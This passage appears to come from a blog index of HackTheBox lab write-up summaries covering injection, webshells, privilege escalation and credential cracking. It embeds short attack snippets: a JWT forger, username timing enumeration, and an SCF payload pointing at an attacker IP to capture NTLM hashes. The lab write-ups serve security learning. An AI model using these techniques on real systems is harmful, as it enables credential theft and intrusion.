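print(out_vuln)  # "checking app.apk" then "INJECTED" on its own line
print(out_safe)  # the whole payload echoed back as literal text
```

In Bash scripts the equivalent fix is quoting every expansion (`"$name"`) and, better, never passing untrusted strings through `eval` or unquoted command substitution.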
HTB: Acute
hackthebox ctf htb-acute nmap feroxbuster powershell-web-access exiftool meterpreter metasploit msfvenom defender defender-bypass-directory screenshare credentials powershell-runas powershell-configuration
Acute is a really nice Windows machine because there’s nothing super complex about the attack paths. Rather, it’s just about maneuvering from user to user using shared creds and privileges available to make the next step. It’s a pure Windows box. There are two hosts to pivot between, limited PowerShell configurations, and lots of enumeration.
HTB: RouterSpace
hackthebox htb-routerspace ctf nmap ubuntu android apk feroxbuster apktool reverse-engineering android-react-native react-native genymotion burp android-burp command-injection linpeas pwnkit cve-2021-4034 polkit cve-2021-3560 cve-2021-22555 baron-samedit cve2021-3156 htb-paper
RouterSpace was all about dynamic analysis of an Android application. Unfortunately, it was a bit tricky to get set up and working. I’ll use a system-wide proxy on the virtualized Android device to route traffic through Burp, identifying the API endpoint and finding a command injection. For root, I’ll exploit the Baron Samedit vulnerability in sudo that came out in early 2021.
HTB: Undetected
hackthebox htb-undetected ctf nmap feroxbuster php wfuzz vhosts composer phpunit cve-2017-9841 webshell reverse-engineering ghidra awk backdoor hashcat apache-mod sshd
Undetected follows the path of an attacker against a partially disabled website. I’ll exploit a misconfigured PHP package to get execution on the host. From there, I’ll find a kernel exploit left behind by the previous attacker, and while it no longer works, the payload shows how it modified the passwd and shadow files to add backdoored users with static passwords, and those users are still present. Further enumeration finds a malicious Apache module responsible for downloading and installing a backdoored sshd binary. Reversing that provides a password I can use to get a root shell.
HTB: Phoenixhackthebox htb-phoenix ctf htb-pressed htb-static nmap wordpress wpscan wp-pie-register wp-asgaros-forum sqli injection time-based-sqli sqlmap hashcat 2fa wp-miniorange totp youtube source-code crypto cyberchef oathtool wp-download-from-files webshell upload pam sch unsch pspy proc wildcard
Phoenix starts off with a WordPress site using a plugin with a blind SQL injection. This injection is quite slow, which I think explains the poor reception for this box overall. Still, a very slow blind SQL injection shows the value in learning to pull out only the bits you need from the DB. I’ll get usernames and password hashes, but that leaves me at a two-factor prompt. I’ll reverse engineer that plugin to figure out what I need from the DB, and get the seed to generate the token. From there, I’ll abuse another plugin to upload a webshell and get a shell on the box. The first pivot involves password reuse and understanding that the PAM 2FA setup isn’t enabled on one interface. The next pivot is wildcard injection in a compiled shell script. I’ll dump the script out (several ways), and then use the injection to get a shell as root.
HTB: Paperhackthebox ctf htb-paper nmap feroxbuster wfuzz vhosts wordpress wpscan rocket-chat cve-2019-17671 directory-traversal password-reuse credentials crackmapexec linpeas cve-2021-3156 cve-2021-4034 pwnkit cve-2021-3650
Paper is a fun easy-rated box themed off characters from the TV show “The Office”. There’s a WordPress vulnerability that allows reading draft posts. In a draft post, I’ll find the URL to register accounts on a Rocket Chat instance. Inside the chat, there’s a bot that can read files. I’ll exploit a directory traversal to read outside the current directory, and find a password that can be used to access the system. To escalate from there, I’ll exploit a 2021 CVE in PolKit. In Beyond Root, I’ll look at a later CVE in Polkit, Pwnkit, and show why Paper wasn’t vulnerable, make it vulnerable, and exploit it.
HTB: Metahackthebox ctf htb-meta nmap wfuzz vhosts wfuzz feroxbuster exiftool composer cve-2021-22204 command-injection pspy mogrify cve-2020-29599 polyglot hackvent imagemagick imagemagick-scripting-language neofetch gtfobins source-code
Meta was all about image processing. It starts with an image metadata service where I’ll exploit a CVE in exiftool to get code execution. From there, I’ll exploit a cron running an ImageMagick script against uploaded files, using an SVG/ImageMagick Scripting Language polyglot to get a shell as the user. For root, I’ll abuse neofetch and environment variables.
HTB: Timinghackthebox ctf htb-timing nmap php feroxbuster wfuzz lfi directory-traversal source-code side-channel timing python bash youtube mass-assignment burp burp-repeater webshell firewall git password-reuse credentials axel sudo-home htb-backendtwo
Timing starts out with a local file include and a directory traversal that allows me to access the source for the website. I’ll identify and abuse a timing attack to identify usernames on a login form. After logging in, there’s a mass assignment vulnerability that allows me to upgrade my user to admin. As admin, I’ll use the LFI plus upload to get execution. To root, I’ll abuse a download program to overwrite root’s authorized_keys file and get SSH access. In Beyond Root, I’ll look at an alternative root, and dig more into mass assignment vulnerabilities.
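The username timing attack above works because the login handler only runs the expensive password hash when the username actually exists, so valid names respond measurably slower. A minimal local sketch of the idea (the sleep stands in for the server’s hash computation; the usernames and threshold are made up):

```python
import time

# Hypothetical vulnerable service: the password hash only runs for
# usernames that exist, so valid names respond measurably slower.
VALID_USERS = {"aaron"}

def login(username, password):
    if username in VALID_USERS:
        time.sleep(0.05)  # stand-in for a bcrypt/PBKDF2 computation
    return False          # wrong password either way

def measure(username, samples=3):
    """Average response time over a few attempts to smooth out jitter."""
    total = 0.0
    for _ in range(samples):
        start = time.monotonic()
        login(username, "wrongpass")
        total += time.monotonic() - start
    return total / samples

def enumerate_users(candidates, threshold=0.02):
    """Keep candidates whose average response time exceeds the threshold."""
    return [u for u in candidates if measure(u) > threshold]
```

Against a real target the same loop wraps an HTTP POST instead of a local function call, and the threshold is picked after sampling a few known-bad usernames.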
SetUID Rabbit Holectf htb-jail suid linux execve c nfs setuid seteuid setresuid
In looking through writeups for Jail after finishing mine, I came across an interesting rabbit hole, which led me down the path of a good deal of research, where I learned interesting detail related to a few things I’ve been using for years. I’ll dive into Linux user IDs and SetUID / SUID, execve vs system, and sh vs bash, and test out what I learn on Jail.
HTB: AdmirerToohtb-admirertoo hackthebox ctf nmap feroxbuster vhosts wfuzz adminer cve-2021-21311 ssrf adminer-oneclick-login opentsdb python flask cve-2020-35476 credentials opencats fail2ban cve-2021-25294 upload cve-2021-32749 whois hydra wireshark ncat htb-forge
AdmirerToo is all about chaining exploits together. I’ll use an SSRF vulnerability in Adminer to discover a local instance of OpenTSDB, and use the SSRF to exploit a command injection to get a shell. Then I’ll exploit a command injection in Fail2Ban that requires I control the result of a whois query about my IP. I’ll abuse a file write vulnerability in OpenCats to upload a malicious whois.conf, and then exploit Fail2Ban, getting a shell. In Beyond Root, I’ll look at the final exploit and why nc didn’t work for me at first, but ncat did.
HTB: Jailhackthebox htb-jail ctf nmap centos nfs feroxbuster bof source-code gdb peda pwntools shellcode socket-reuse nfs-nosquash rvim gtfobins rar quipquip crypto hashcat hashcat-rules atbash rsa rsactftool facl getfacl htb-laboratory htb-tartarsauce
Jail is an old HTB machine that is still really nice to play today. There’s a bunch of interesting fundamentals to work through. It starts with a buffer overflow in a jail application that can be exploited to get execution. It’s a very beginner BOF, with stack execution enabled, access to the source, and a way to leak the input buffer address. From there, I’ll abuse an NFS share without user squashing to escalate to the next user. Then there’s an rvim escape to get the next user. And finally a crypto challenge to get root. Jail sent me a bit down the rabbit hole on NFS, so some interesting exploration in Beyond Root, including an alternative way to make the jump from frank to adm.
HTB: Pandoractf hackthebox htb-pandora nmap feroxbuster vhosts snmp snmpwalk snmpbulkwalk mibs python python-dataclass pandora-fms cve-2021-32099 sqli injection sqli-union sqlmap auth-bypass cve-2020-13851 command-injection upload webshell path-hijack mpm-itk apache youtube htb-sneaky htb-openkeys
Pandora starts off with some SNMP enumeration to find a username and password that can be used to get a shell. This provides access to a Pandora FMS system on localhost, which has multiple vulnerabilities. I’ll exploit a SQL injection to read the database and get session cookies. I can exploit that same page to get admin and upload a webshell, or exploit another command injection CVE to get execution. To get root, there’s a simple path hijack in a SUID binary, but I’ll have to switch to SSH access, as there’s a sandbox in an Apache module that prevents running the SUID binary as root while a descendant process of Apache. I’ll explore that in depth in Beyond Root.
HTB: Miraihackthebox htb-mirai ctf nmap raspberrypi feroxbuster plex pihole default-creds deleted-file extundelete testdisk photorec
Mirai was a RaspberryPi device running PiHole that happens to still have the RaspberryPi default username and password. That user can even sudo to root, but there is a bit of a hitch at the end. I’ll have to recover the deleted root flag from a USB drive.
HTB: Brainfuckhtb-brainfuck hackthebox ctf nmap vhosts wordpress ubuntu wpscan wp-support-plus crypto auth-bypass smtp email vigenere john rsa lxc lxd sudo htb-spectra htb-tabby
Brainfuck was one of the first boxes released on HackTheBox. It’s a much more unrealistic and CTF style box than would appear on HTB today, but there are still elements of it that can be a good learning opportunity. There’s WordPress exploitation and a bunch of crypto, including RSA and Vigenere.
HTB: Fingerprintctf hackthebox htb-fingerprint nmap ubuntu ubuntu-1804 python werkzeug feroxbuster execute-after-redirect burp burp-repeater burp-proxy glassfish java browser-fingerprint source-code directory-traversal flask proc hql hql-injection boolean-injection youtube xss jwt jwt-io deserialization java-deserialization maven jd-gui java-byte-code tunnel crypto aes aes-ecb padding-attack htb-previse
For each step in Fingerprint, I’ll have to find multiple vulnerabilities and make them work together to accomplish some goal. To get a shell, I’ll abuse an execute-after-redirect (EAR) vulnerability, a directory traversal, HQL injection, and cross-site scripting to collect the pieces necessary for the remote exploit. I’ll generate a custom Java serialized payload and abuse a shared JWT signing secret to get execution and a shell. To get to the next user I’ll need to brute force an SSH key character by character using a SUID program, and find the decryption password in a Java Jar. To get root, I’ll need to abuse a new version of one of the initial webservers, conducting a padding attack on the AES cookie to forge a malicious admin cookie, and then use the directory traversal to read the root SSH key.
HTB: Fulcrumctf hackthebox htb-fulcrum nmap ubuntu windows feroxbuster api xxe burp burp-repeater python ssrf rfi qemu tunnel powershell powershell-credential chisel evil-winrm web-config ldap powerview credentials htb-reel htb-omni
Fulcrum is a 2017 release that got a rebuild in 2022. It’s a Linux server with four websites, including one that returns Windows .NET error messages. I’ll exploit an API endpoint via XXE, and use that as an SSRF to get execution through a remote file include. From there I’ll pivot to the Windows webserver with some credentials, enumerate LDAP, and pivot to the file server, which can read shares on the DC. In those shares, I’ll find a login script with creds associated with one of the domain admins, and use that to read the flag from the DC, as well as to get a shell. This box has a lot of tunneling, representing a small mixed-OS network on one box.
HTB: Unicodectf htb-unicode hackthebox nmap flask python jwt-io feroxbuster jwt-rsa open-redirect filter waf unicode unicode-normalization directory-traversal credentials share pyinstaller pyinstxtractor uncompyle6 parameter-injection htb-backdoor
HTB: Returnctf hackthebox htb-return nmap windows crackmapexec printer feroxbuster ldap wireshark evil-winrm server-operators service service-hijack windows-service htb-fuse htb-blackfield
Return was a straightforward box released for the HackTheBox printer track. This time I’ll abuse a printer web admin panel to get LDAP credentials, which can also be used for WinRM. The account is in the Server Operators group, which allows it to modify, start, and stop services. I’ll abuse this to get a shell as SYSTEM.
HTB: Antiquehtb-antique hackthebox ctf printer nmap jetdirect telnet python snmp snmpwalk tunnel chisel cups cve-2012-5519 hashcat shadow cve-2015-1158 pwnkit shared-object cve-2021-4034
Antique released non-competitively as part of HackTheBox’s Printer track. It’s a box simulating an old HP printer. I’ll start by leaking a password over SNMP, and then use that over telnet to connect to the printer, where there’s an exec command to run commands on the system. To escalate, I’ll abuse an old instance of CUPS print manager software to get file read as root, and get the root flag. In Beyond Root, I’ll look at two more CVEs, another CUPS one that didn’t work because no actual printers were attached, and PwnKit, which does work.
HTB: BackendTwohtb-backendtwo ctf uhc hackthebox nmap uvicorn python api json jq wfuzz feroxbuster swagger fastapi jwt pyjwt jwt-io simple-modify-headers credentials pam-wordle mass-assignment cyberchef htb-backdoor htb-altered
BackendTwo is this month’s UHC box. It builds on the first Backend UHC box, but with some updated vulnerabilities, as well as a couple small repeats from steps that never got played in UHC competition. It starts with an API that I’ll fuzz to figure out how to register. Then I’ll abuse a mass assignment vulnerability to give my user admin privs. From there, I can use a file read endpoint to read /proc and find the page source, and eventually the signing secret for the JWT. With that, I can forge a new token allowing access to the file write API, where I’ll quietly insert a backdoor into an endpoint that returns a shell (and show how to just smash the door in as well). To escalate, it’s password reuse and cheating at pam-wordle.
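The mass assignment bug in a nutshell: an update endpoint that copies every client-supplied field onto the user object. A minimal sketch of the vulnerable pattern and an allow-list fix (the class and field names here are hypothetical, not BackendTwo’s actual schema):

```python
class User:
    def __init__(self, username):
        self.username = username
        self.is_admin = False  # should only ever be set server-side

def update_profile(user, fields):
    # Vulnerable: no allow-list, so a request body like
    # {"is_admin": true} silently escalates privileges.
    for key, value in fields.items():
        setattr(user, key, value)

def update_profile_safe(user, fields, allowed=("username",)):
    # Fixed: only explicitly permitted fields are copied over.
    for key in allowed:
        if key in fields:
            setattr(user, key, fields[key])
```

From the attacker’s side, exploiting it is just adding the extra key to the JSON body of an otherwise legitimate profile-update request.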
HTB: Searchhtb-search hackthebox ctf nmap domain-controller active-directory vhosts credentials feroxbuster smbmap smbclient password-spray ldapsearch ldapdomaindump jq bloodhound-py bloodhound kerberoast hashcat crackmapexec msoffice office excel certificate pfx2john firefox-certificate certificate client-certificate powershell-web-access gmsa youtube
Search was a classic Active Directory Windows box. It starts by finding credentials in an image on the website, which I’ll use to dump the LDAP for the domain and find a Kerberoastable user. There’s more pivoting from there, each time finding another clue: spraying for password reuse, credentials in an Excel workbook, and access to a PowerShell Web Access instance protected by client certificates. With that initial shell, it’s a few hops identified through BloodHound, including recovering a GMSA password, to get to domain admin.
HTB: Rabbitctf htb-rabbit hackthebox nmap iis apache wamp feroxbuster owa exchange joomla complain-management-system searchsploit sqli burp burp-repeater sqlmap crackstation phishing openoffice macro certutil powershellv2 webshell schtasks attrib htb-sizzle htb-fighter
Rabbit was all about enumeration and rabbit holes. I’ll work to quickly eliminate vectors and try to focus in on ones that seem promising. I’ll find an instance of Complain Management System, and exploit multiple SQL injections to get a dump of hashes and usernames. I’ll use them to log into an Outlook Web Access portal, and use that access to send phishing documents with macros to get a shell. From there, I’ll find one of the webservers running as SYSTEM and write a webshell to get a shell. In Beyond Root, a look at a comically silly bug in the Complain Management System’s forgot password feature, as well as at the scheduled tasks on the box handling the automation.
HTB: Fighterhtb-fighter hackthebox ctf nmap iis vhosts wfuzz feroxbuster sqli burp burp-repeater xp-cmdshell nishang windows-firewall applocker driverquery capcom-sys ghidra python msbuild applocker-bypass msfvenom msfconsole metasploit juicypotato htb-fuse
Fighter is a solid old Windows box that requires avoiding AppLocker rules to exploit an SQL injection, hijack a bat script, and exploit the infamous Capcom driver. I’ll show the intended path, as well as some AppLocker bypasses, how to modify the Metasploit Capcom exploit to work, and JuicyPotato (which was born from this box).
Parallelizing in Bash and Pythonhtb-backdoor ctf hackthebox python bash bash-async async python-async youtube programming brute-force
To solve the Backdoor box from HackTheBox, I used a Bash script to loop over 2000 pids using a directory traversal / local file read vulnerability and pull their command lines. I wanted to play with parallelizing that attack, both in Bash and Python. I’ll share the results in this post / YouTube video.
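The Python side of that experiment boils down to mapping a thread pool over the PID range. A sketch of the pattern, with a placeholder function standing in for the actual HTTP request through the directory traversal:

```python
from concurrent.futures import ThreadPoolExecutor

def fetch_cmdline(pid):
    # Placeholder for the real request, e.g. fetching
    # /proc/<pid>/cmdline through the vulnerable endpoint.
    return f"cmdline-for-{pid}"

def sweep(pids, workers=20):
    # Threads fit this I/O-bound job: each one blocks on the network
    # while the others keep issuing requests. pool.map preserves the
    # input order, so zip pairs each pid with its own result.
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return dict(zip(pids, pool.map(fetch_cmdline, pids)))

results = sweep(range(1, 2001))
```

With real requests, the speedup comes almost entirely from overlapping network latency; tuning `workers` trades speed against hammering the target.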
HTB: Backdoorhtb-backdoor ctf hackthebox nmap wordpress wpscan feroxbuster exploit-db directory-traversal ebooks-download proc bash msfvenom gdb gdbserver gdb-remote metasploit screen htb-pressed
Backdoor starts by finding a WordPress plugin with a directory traversal bug that allows me to read files from the filesystem. I’ll use that to read within the /proc directory and identify a previously unknown listening port as gdbserver, which I’ll then exploit to get a shell. To get to root, I’ll join a screen session running as root in multiuser mode.
HTB: Ariekeictf hackthebox htb-ariekei nmap vhosts wfuzz youtube waf feroxbuster cgi shellshock cve-2014-6271 image-tragick image-magick cve-2016-3714 docker pivot password-reuse tunnel ssh2john hashcat htb-shocker
Ariekei is an insane-rated machine released on HackTheBox in 2017, focused around two very well known vulnerabilities, Shellshock and ImageTragick. I’ll find Shellshock very quickly, but won’t be able to exploit it due to a web application firewall. I’ll turn to another virtual host where there’s an image upload, and exploit ImageTragick to get a shell in a Docker container. I’ll use what I can enumerate about the network of Docker containers and their secrets to pivot to a new container that can talk directly to the website that’s vulnerable to Shellshock without the WAF, and exploit it to get access there. After escalating, I’ll find an SSH key that provides access to the host, and abuse the docker group to escalate to root.
HTB: Tobyhackthebox ctf htb-toby nmap vhosts wfuzz wordpress backdoor wpscan gogs git source-code feroxbuster cyberchef crypto php-deobfuscation wireshark python youtube docker pivot hashcat chisel pam ghidra htb-kryptos
Toby was a really unique challenge that involved tracing a previous attacker’s steps and poking at backdoors without full information about how they work. I’ll start by getting access to PHP source that shows where a webshell is loaded, but not the full execution. I’ll have to play with it to get it to give execution, figuring out how it communicates. From there I’ll pivot into a MySQL container and get hashes to get into the Gogs instance. Source code analysis plus some clever password generation allows me to pivot onto the main host, where I’ll have to use trouble tickets to find a PAM backdoor and brute force the password.
HTB: Jeeveshtb-jeeves hackthebox ctf nmap windows feroxbuster gobuster jetty jenkins keepass kpcli hashcat passthehash crackstation psexec-py alternative-data-streams htb-object
Jeeves was first released in 2017, and I first solved it in 2018. Four years later, it’s been an interesting one to revisit. Some of the concepts seem not that new and exciting, but it’s worth remembering that Jeeves was the first to do them. I’ll start with a webserver and find a Jenkins instance with no auth. I can abuse Jenkins to get execution and remote shell. From there, I’ll find a KeePass database, and pull out a hash that I can pass to get execution as Administrator. root.txt is actually hidden in an alternative data stream.
HTB: Backendhtb-backend ctf hackthebox nmap api json uvicorn feroxbuster wfuzz swagger fastapi python jwt pyjwt jwt-io simple-modify-headers burp credentials uhc
Backend was all about enumerating and abusing an API, first to get access to the Swagger docs, then to get admin access, and then debug access. From there it allows execution of commands, which provides a shell on the box. To escalate to root, I’ll find a root password in the application logs, where a user must have typed their password into the name field.
HTB: Tallyhackthebox ctf htb-tally nmap windows sharepoint mssql keepass hashcat kpcli crackmapexec smbclient mssqlclient xp-cmdshell firefox user-agent searchsploit cve-2016-1960 shellcode python scheduled-task rottenpotato sweetpotato cve-2017-0213 visual-studio windows-sessions msfvenom metasploit migrate
Tally is a difficult Windows Machine from Egre55, who likes to make boxes with multiple paths for each step. The box starts with a lot of enumeration, starting with a SharePoint instance that leaks creds for FTP. With FTP access, there are two paths to root. First there’s a KeePass db with creds for SMB, which has a binary with creds for MSSQL, and I can use MSSQL access to run commands and get a shell. Alternatively, I can spot a Firefox installer and a note saying that certain HTML pages on the FTP server will be visited regularly, and craft a malicious page to exploit that browser. To escalate, there’s a scheduled task running a writable PowerShell script as administrator. There’s also SeImpersonate privilege in a shell gained via MSSQL, which can be leveraged to get root as well. Finally, I’ll show a local Windows exploit that was common at the time of the box release, CVE-2017-0213.
HTB: Overflowhackthebox htb-overflow ctf nmap ubuntu cookie padding-oracle python feroxbuster padbuster vhosts sqli sqlmap hashcat cmsmadesimple cve-2021-22204 exiftool password-reuse facl getfacl hosts time-of-check-time-of-use ghidra bof crypto gdb youtube htb-lazy
HTB: Minionhtb-minion hackthebox ctf nmap windows asp aspx iis feroxbuster webshell wfuzz ssrf icmp-exfil youtube python powershell python-cmd powershell-runas alternative-data-streams crackstation ghidra htb-nest
Minion is four and a half years old, but it’s still really difficult. The steps themselves are not that hard, but the difficulty comes with the firewall that only allows ICMP out. So while I find a blind command execution relatively quickly, I’ll have to write my own shell using Python and PowerShell to exfil data over pings. The rest of the steps are also not hard on their own, just difficult to work through my ICMP shell. I’ll hijack a writable PowerShell script that runs on a schedule, and then find a password from the Administrator user in an alternative data stream on a backup file to get admin access.
HTB: Inceptionctf hackthebox htb-inception nmap dompdf feroxbuster squid proxychains wfuzz container lxd php-filter webdav davtest wireshark webshell forward-shell wordpress ping-sweep tftp apt apt-pre-invoke youtube htb-joker htb-granny
Inception was one of the first boxes on HTB that used containers. I’ll start by exploiting a dompdf WordPress plugin to get access to files on the filesystem, which I’ll use to identify a WebDAV directory and credentials. I’ll abuse WebDAV to upload a webshell, and get a foothold in a container. Unfortunately, outbound traffic is blocked, so I can’t get a reverse shell. I’ll write a forward shell in Python to get a solid shell. After some password reuse and sudo, I’ll have root in the container. Looking at the host, from the container I can access FTP and TFTP. Using the two I’ll identify a cron running apt update, and write a pre-invoke script to get a shell.
HTB: Shibbolethctf htb-shibboleth hackthebox nmap vhosts wfuzz feroxbuster zabbix ipmi msfconsole msfvenom shared-object rakp ipmipwner hashcat password-reuse credentials mysql cve-2021-27928 youtube htb-zipper oscp-like
Shibboleth starts with a static website and not much else. I’ll have to identify the clue to look into BMC automation and find IPMI listening on UDP. I’ll leak a hash from IPMI, and crack it to get creds to a Zabbix instance. Within Zabbix, I’ll have the agent run a command, providing a foothold. Some credential reuse pivots to the next user. To get root, I’ll exploit a CVE in MariaDB / MySQL. In Beyond Root, a video reversing the shared object file I used in that root exploit, as well as generating my own in C.
HTB: Alteredctf hackthebox htb-altered uhc nmap laravel php type-juggling password-reset wfuzz bruteforce feroxbuster rate-limit sqli sqli-file sqli-union burp burp-repeater webshell dirtypipe cve-2022-0847 pam-wordle passwd ghidra reverse-engineering htb-ransom
Altered was another Ultimate Hacking Championship (UHC) box that’s now up on HTB. This one has another Laravel website. This time I’ll abuse the password reset capability, bypassing the rate limiting using HTTP headers to brute force the PIN. Once in, I’ll find an endpoint that’s vulnerable to SQL injection, but only after abusing type juggling to bypass an integrity check. Using that SQL injection, I’ll write a webshell and get a foothold. To get to root, I’ll abuse Dirty Pipe, with a twist. Most of the scripts to exploit Dirty Pipe modify the passwd file, but this box has pam-wordle installed, so you must play a silly game of tech-based Wordle to auth. I’ll show both how to solve this and how to use a different technique that overwrites a SUID executable. In Beyond Root, I’ll reverse how that latter exploit works.
HTB: Secrethackthebox htb-secret ctf nmap jwt pyjwt express feroxbuster api source-code git command-injection pr-set-dumpable suid crash-dump var-crash appport-unpack core-dump
To get a foothold on Secret, I’ll start with source code analysis in a Git repository to identify how authentication works and find the JWT signing secret. With that secret, I’ll get access to the admin functions, one of which is vulnerable to command injection, and use this to get a shell. To get to root, I’ll abuse a SUID file in two different ways. The first is to get read access to files using the open file descriptors. The alternative path is to crash the program and read the content from the crashdump.
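Once a JWT signing secret leaks, forging an admin token is mechanical. A stdlib-only sketch of what a library like pyjwt does for HS256 (the claim name and secret below are illustrative placeholders, not the box’s actual values):

```python
import base64
import hashlib
import hmac
import json

def b64url(data):
    """Base64url without padding, as JWTs use."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def forge_jwt(payload, secret):
    """Build an HS256-signed JWT: header.payload.signature."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url(json.dumps(payload).encode())
    signing_input = f"{header}.{body}".encode()
    sig = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
    return f"{header}.{body}.{b64url(sig)}"

# Placeholder claim and secret for illustration only.
token = forge_jwt({"name": "theadmin"}, "leaked-signing-secret")
```

Since the server verifies the signature with the same secret, any payload signed this way is accepted as authentic.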
HTB: Stackedhackthebox ctf htb-stacked nmap localstack feroxbuster wfuzz vhosts docker docker-compose xss burp burp-repeater xss-referer aws awslocal aws-lambda cve-2021-32090 command-injection pspy container htb-crossfit htb-bankrobber htb-bucket htb-epsilon oscp-plus
Stacked was really hard. The foothold involved identifying XSS in a Referer header that landed in a mail application that I could not see. I’ll use the XSS to enumerate that mailbox and find a subdomain used for an instance of localstack. From there, I’ll find I can create Lambda functions, and there’s a command injection vulnerability in the dashboard if it displays a malformed function name. I’ll use the XSS to load that page in an iframe and trigger the vulnerability, providing a foothold in the localstack container. To escalate in that container, I’ll use pspy to monitor what happens when localstack runs a Lambda function, and find that it is also vulnerable to command injection as root. From root in the container, I can get full access to the host filesystem and a shell. In Beyond Root, I’ll take a look at the mail application and the automations triggering the XSS vulnerabilities.
HTB: Ransomctf hackthebox htb-ransom uhc nmap type-juggling ubuntu php laravel feroxbuster burp burp-repeater zipcrypto known-plaintext crypto bkcrack
Ransom was a UHC qualifier box, targeting the easy to medium range. It has three basic steps. First, I’ll bypass a login screen by playing with the request and type juggling. Then I’ll access files in an encrypted zip archive using a known-plaintext attack and bkcrack. Finally, I’ll find credentials in HTML source that work to get root on the box. In Beyond Root, I’ll look at the structure of a Laravel application, examine how the API requests were handled and how I managed to get JSON data into a GET request, and finally look at the type juggling, why it worked, and how to fix it.
HTB: Devzathackthebox ctf htb-devzat nmap ubuntu vhosts wfuzz devzat feroxbuster go git source-code lfi directory-traversal command-injection influxdb cve-2019-20933 jwt pyjwt jwt-io htb-cereal htb-dyplesher htb-travel htb-epsilon
Devzat is centered around a chat over SSH tool called Devzat. To start, I can connect, but there is at least one username I can’t access. I’ll find a pet-themed site on a virtual host, and find it has an exposed git repository. Looking at the code shows file read / directory traversal and command injection vulnerabilities. I’ll use the command injection to get a shell. From localhost, I can access the chat for the first user, where there’s history showing another user telling them about an influxdb instance. I’ll find an auth bypass exploit to read the db, and get the next user’s password. This user has access to the source for a new version of Devzat. Analysis of this version shows a new command, complete with a file read vulnerability that I’ll use to read root’s private key and get a shell over SSH.
HTB: Epsilonhackthebox ctf htb-epsilon nmap feroxbuster git gitdumper source-code flask python aws awscli aws-lambda htb-gobox htb-bolt htb-bucket jwt ssti burp burp-repeater pspy timing-attack cron
Epsilon originally released in the 2021 HTB University CTF, but later released on HTB for others to play. In this box, I’ll start by finding an exposed git repo on the webserver, and use that to find source code for the site, including the AWS keys. Those keys get access to lambda functions which contain a secret that is reused as the secret for the signing of JWT tokens on the site. With that secret, I’ll get access to the site and abuse a server-side template injection to get execution and an initial shell. To escalate to root, there’s a backup script that is creating tar archives of the webserver which I can abuse to get a copy of root’s home directory, including the flag and an SSH key for shell access.
HTB: Hancliffehtb-hancliffe hackthebox ctf nmap hashpass nuxeo uri-parsing feroxbuster ssti java windows unified-remote tunnel chisel msfvenom firefox firepwd winpeas evil-winrm youtube htb-seal htb-logforge reverse-engineering ghidra x32dbg rot-47 atbash cyberchef pattern-create bof jmp-esp metasm nasm socket-reuse shellcode pwntools wmic dep
Hancliffe starts with a URI parsing vulnerability that provides access to an internal instance of Nuxeo, which is vulnerable to a Java server-side template injection that leads to RCE. With a foothold, I can tunnel to access an instance of Unified Remote, which allows RCE as the next user. That user has a stored password in Firefox for H@$hPa$$, which gives the password for the next user. Finally, this user has access to a development application that is vulnerable to an interesting and tricky buffer overflow, where I’ll have to jump around on the stack and use socket reuse to get execution as administrator.
HTB: Objecthackthebox htb-object ctf uni-ctf nmap iis windows feroxbuster wfuzz jenkins cicd firewall windows-firewall jenkins-credential-decryptor pwn-jenkins evil-winrm crackmapexec bloodhound sharphound active-directory github forcechangepassword genericwrite writeowner logon-script powerview scheduled-task powershell htb-jeeves oscp-like
Object was tricky for a CTF box, from the HackTheBox University CTF in 2021. I’ll start with access to a Jenkins server where I can create a pipeline (or job), but I don’t have permissions to manually tell it to build. I’ll show two ways to get it to build anyway, providing execution. I’ll enumerate the firewall to see that no TCP traffic can reach outbound, and eventually find credentials and get a connection over WinRM. From there, it’s three hops of Active Directory abuse, all made clear by BloodHound. First a password change, then abusing logon scripts, and finally some group privileges. In Beyond Root, I’ll enumerate the automation that ran the logon scripts as one of the users.
HTB: Driverctf hackthebox htb-driver nmap windows feroxbuster net-ntlmv2 scf responder hashcat crackmapexec evil-winrm cve-2019-19363 winpeas powershell history powershell-history printer metasploit exploit-suggestor windows-sessions printnightmare cve-2021-1675 invoke-nightmare htb-sizzle
Driver released as part of the HackTheBox printer exploitation track. To get access, there’s a printer web page that allows users to upload to a file share. I’ll upload an scf file, which triggers anyone looking at the share in Explorer to try network authentication to my server, where I’ll capture and crack the password for the user. That password works to connect to WinRM, providing a foothold to Driver. To escalate, I can exploit either a Ricoh printer driver or PrintNightmare, and I’ll show both.
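The scf trick works because Explorer fetches the file’s icon from whatever UNC path the file names, the moment the share is rendered, sending Net-NTLMv2 authentication to the attacker’s listener (Responder or similar). A typical payload looks something like this, with the IP and share path being whatever the attacker controls:

```ini
[Shell]
Command=2
IconFile=\\10.10.14.6\share\pwn.ico
[Taskbar]
Command=ToggleDesktop
```

The icon file itself never needs to exist; the authentication attempt to fetch it is the whole point.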
HTB: GoodGameshtb-goodgames hackthebox ctf uni-ctf vhosts sqli sqli-bypass sqli-union feroxbuster burp burp-repeater ssti docker escape docker-mount htb-bolt
GoodGames has some basic web vulnerabilities. First there’s a SQL injection that allows for both a login bypass and union injection to dump data. The admin’s page shows a new virtual host, which, after authing with creds from the database, has a server-side template injection vulnerability in the name on the profile, which allows for code execution and a shell in a Docker container. From that container, I’ll find the same password reused by a user on the host, and SSH in to get access. On the host, I’ll abuse the home directory that’s mounted into the container and the way Linux does file permissions and ownership to get a shell as root on the host.
HTB: Boltctf hackthebox htb-bolt youtube nmap vhosts wfuzz ffuf docker docker-tar feroxbuster roundcube webmail passbolt dive sqlite hashcat source-code ssti payloadsallthethings password-reuse password-reset credentials chrome john python
Bolt was all about exploiting various websites with different bits of information collected along the way. To start, I’ll download a Docker image from the website, and pull various secrets from the older layers of the image, including a SQLite database and the source to the demo website. With that, I’m able to get into the demo website and exploit a server-side template injection vulnerability to get a foothold on the box. After some password reuse to get to the next user, I’ll go into the user’s Chrome profile to pull out the PGP key associated with their Passbolt password manager account, and use it along with database access to reset the users password and get access to their passwords, including the root password. In Beyond Root, a deep dive into the SSTI payloads used on this box.
HTB: SteamCloudhackthebox htb-steamcloud ctf uni-ctf nmap kubernetes minikube htb-unobtainium kubectl kubeletctl container
SteamCloud just presents a bunch of Kubernetes-related ports. Without a way to authenticate, I can’t do anything with the Kubernetes API. But I also have access to the Kubelet running on one of the nodes (which is the same host), and that gives access to the pods running on that node. I’ll get into one and get out the keys necessary to auth to the Kubernetes API. From there, I can spawn a new pod, mounting the host file system into it, and get full access to the host. I’ll eventually manage to turn that access into a shell as well.
